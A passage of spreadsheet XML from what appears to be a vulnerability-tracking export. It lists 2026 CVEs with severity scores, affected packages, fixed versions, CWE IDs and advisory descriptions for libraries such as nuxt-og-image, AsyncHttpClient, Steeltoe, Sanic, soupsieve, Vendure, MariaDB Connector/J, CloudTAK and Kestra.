        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86049</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61793</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr"/>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt-og-image</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>6.7.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-20, CWE-441, CWE-749, CWE-918</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>Nuxt OG Image generates OG Images with Vue templates in Nuxt. From 6.0.2 until 6.7.0, nuxt-og-image exposes the unauthenticated /_og/d/** route when the documented defaults security.strict = false and security.secret = "" are used, and base64url-decodes the fonts parameter through decodeOgImageParams. Attacker-controlled fonts[].path values flow through loadDefinedFonts into the font-assets/node.js binding, which performs a server-side fetch without validating the URL scheme, origin, resolved address, or redirects. This permits blind requests to loopback, private, link-local, cloud metadata, and other internal HTTP services, while differences in the outer response status and timing can reveal service reachability. Slow targets can also occupy OG image render workers for the configured fetch and render timeouts. This issue is fixed in version 6.7.0.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61793</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85717</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.14.5 to 2.16.0 and from 3.0.9 to 3.0.11, a client configured with a client-wide Realm and redirect following can disclose credentials after a cross-origin redirect because the Interceptors authentication path falls back to the client configuration after redirect handling clears the per-exchange realm. If the attacker-controlled target returns 401, the client can send Basic or Digest credentials or a Negotiate or NTLM token to that origin. Per-request realms are stripped correctly, and this issue is a residual bypass of the earlier cross-origin credential-stripping fixes. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85717</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81868</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Security.Authorization.Certificate</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-288, CWE-295</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, Steeltoe.Security.Authorization.Certificate deployments using AddOrgAndSpacePolicies() and UseCertificateAuthorization() trust the public certificate supplied in the X-Client-Cert request header without proving possession of the corresponding private key. Common Cloud Foundry routers do not remove this header from inbound requests. When inbound requests are not restricted to a known trusted proxy source IP, an attacker who obtains the public certificate of an application instance in the target organization or space and can reach the application can spoof X-Client-Cert to bypass the SameOrg and SameSpace policies for the certificate validity period. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81868</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85078</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr">
        <is>
          <t>pip:sanic</t>
        </is>
      </c>
      <c r="M21" s="5" t="inlineStr">
        <is>
          <t>24.12.1, 25.12.1</t>
        </is>
      </c>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. In version 25.12.0, Sanic's core HTTP/1.1 chunked-body handling does not fully consume the trailer-part after the terminating zero chunk before reusing the keep-alive connection buffer. A remote unauthenticated client can place attacker-controlled bytes in that trailer region, causing Sanic to parse and route them as a hidden second request after the outer request. This breaks HTTP request-boundary integrity and can provide a request-smuggling primitive when Sanic is deployed behind intermediaries. This issue is fixed in version 25.12.1.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85078</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75523</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr"/>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Management.Endpoint</t>
        </is>
      </c>
      <c r="M22" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, the Steeltoe.Management.Endpoint /actuator/httpexchanges endpoint passes recorded request URIs through MaskedUri, which masks URI user information but does not inspect query strings. When Management:Endpoints:HttpExchanges:IncludeQueryString is enabled, the HttpExchangeRequest response can disclose OAuth tokens, password-reset tokens, signed-URL signatures, API keys, and other query-string secrets from prior traffic to a caller that can reach the explicitly exposed endpoint. The Steeltoe.Management.Endpoint.Actuators.HttpExchanges DEBUG logger also records these URIs, creating a second disclosure channel for users with log access. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75523</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85720</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr"/>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M23" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, a request using an HTTP proxy to reach an HTTPS origin can expose preemptive origin credentials because NettyRequestFactory and NettyRequestSender.sendRequestWithNewChannel attach Authorization to the plaintext CONNECT request before the TLS tunnel exists. Basic or Digest credentials and per-connection NTLM, Kerberos, or SPNEGO tokens intended for the origin are therefore visible to the proxy and to observers on the client-to-proxy hop. The tunneled request still receives origin Authorization after the tunnel is established, while Proxy-Authorization remains on CONNECT for its intended proxy recipient. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85720</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63461</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/core</t>
        </is>
      </c>
      <c r="M24" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop API products, collections, and facets queries combine mandatory visibility guards with caller-supplied filters using the caller-controlled filterOperator. When filterOperator is OR, a predicate matching a hidden entity can bypass the Product.enabled, Collection.isPrivate, or Facet.isPrivate guard. An unauthenticated caller can therefore retrieve disabled products and private collections or facets. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63461</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85999</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M25" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, selector_iter in src/soupsieve/css_parser.py trims the raw selector with RE_WS_END, an end-anchored WSC whitespace-and-comment expression used with search(), so the regular expression engine retries a greedy scan at every starting offset. An attacker-controlled valid selector containing a long internal whitespace run, or a selector containing a long CSS comment run followed by another token, causes quadratic CPU work before tokenization. User-controlled selectors can reach the path through soupsieve.compile() and BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. This root cause is separate from the IDENTIFIER and VALUE backtracking vulnerability because the cost occurs in RE_WS_END.search during trimming rather than token matching. The resulting CPU consumption can hold the Python GIL, exhaust workers, and stall a service without causing memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85999</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86000</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr">
        <is>
          <t>pip:soupsieve</t>
        </is>
      </c>
      <c r="M26" s="5" t="inlineStr">
        <is>
          <t>2.9.0</t>
        </is>
      </c>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>Soup Sieve is a CSS selector library designed to be used with Beautiful Soup 4. Prior to 2.9, the selector parser in src/soupsieve/css_parser.py defines IDENTIFIER with adjacent quantified groups over overlapping character classes, and VALUE embeds IDENTIFIER for attribute selectors. When an attacker-controlled selector contains a long identifier or unquoted attribute-value run followed by input that makes the overall match fail, the regular expression engine explores quadratically many splits between the overlapping groups. User-controlled selectors can reach this path through soupsieve.compile(), soupsieve.select(), or BeautifulSoup.select(), while applications using only hard-coded selectors are unaffected. The resulting CPU consumption can hold the Python GIL, exhaust application workers, and stall a service; successful plain identifier matches are linear, and the issue does not cause memory corruption or code execution. The issue is fixed in version 2.9.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86000</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54546</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr">
        <is>
          <t>npm:@tak-ps/cloudtak</t>
        </is>
      </c>
      <c r="M27" s="5" t="inlineStr">
        <is>
          <t>13.22.1</t>
        </is>
      </c>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to 13.22.1, the authenticated PUT /api/basemap endpoint passes an attacker-controlled URL through importBasemapURL() in api/routes/basemap.ts to fetch(url) without resolved-address classification or redirect revalidation. BasemapProtocol.isValidURL in api/lib/interface-basemap.ts checks only the HTTP or HTTPS scheme and is not applied on the vulnerable import path. Direct internal addresses, alternate IP encodings, and redirects to internal addresses can reach cloud metadata, loopback, private, and CGNAT HTTP services. The OptionalTileJSON response reflects fields including name, attribution, and tiles[0] to the caller, making the request forgery full-read rather than blind and enabling cloud credential theft and internal service disclosure. This issue is fixed in version 13.22.1.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54546</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61700</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr">
        <is>
          <t>maven:org.mariadb.jdbc:mariadb-java-client</t>
        </is>
      </c>
      <c r="M28" s="5" t="inlineStr">
        <is>
          <t>2.7.14, 3.3.5, 3.4.3, 3.5.9</t>
        </is>
      </c>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, ClientMessage.readPacket processes a server-initiated LOCAL INFILE protocol packet 0xfb without enforcing allowLocalInfile=false. When an application sends a LOAD DATA LOCAL INFILE COM_QUERY, a rogue or man-in-the-middle server can echo the same filename and cause the connector to transmit that file despite the disabled option. The server cannot redirect the request to an arbitrary path and can receive only the exact file already selected by the application, so exploitation requires an application that actively loads sensitive data over an untrusted connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61700</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85716</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M29" s="5" t="inlineStr">
        <is>
          <t>3.0.12</t>
        </is>
      </c>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-390</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 3.0.8 until 3.0.12, processScramAuthenticationInfo and processAuthenticationInfo compute the SCRAM ServerSignature or Digest rspauth verification result but log a mismatch and still deliver the response as authenticated. On a non-TLS or compromised transport, a peer that has not proved knowledge of the shared secret can therefore be accepted as the server. The fix rejects a present invalid value and computes Digest rspauth from the Authorization parameters actually sent, but verification remains unenforced when the value is absent, the sent parameters cannot be recovered, or Digest uses qop=auth-int. This issue is fixed in version 3.0.12.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85716</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73245</t>
        </is>
      </c>
      <c r="D30" s="5" t="inlineStr"/>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr">
        <is>
          <t>Maven:io.kestra:kestra</t>
        </is>
      </c>
      <c r="M30" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr"/>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>## Summary
Kestra's Micronaut **management endpoints are served on port 8081 with no authentication**, even when the main API (port 8080) has basic-auth enabled. Anyone who can reach `:8081` can read `GET /env` (full resolved environment/configuration) and mutate runtime state via `POST /loggers/{name}` (change log levels), among the other management endpoints. Enabling basic-auth creates a false sense of protection because the auth filter only covers `/api/v1/**` on 8080 and never applies to the 8081 management port. The shipped repository contains no statement that 8081 is management-only / must-not-be-exposed, and the vendor's reference `docker-compose.yml` publishes it with no warning.
## Affected
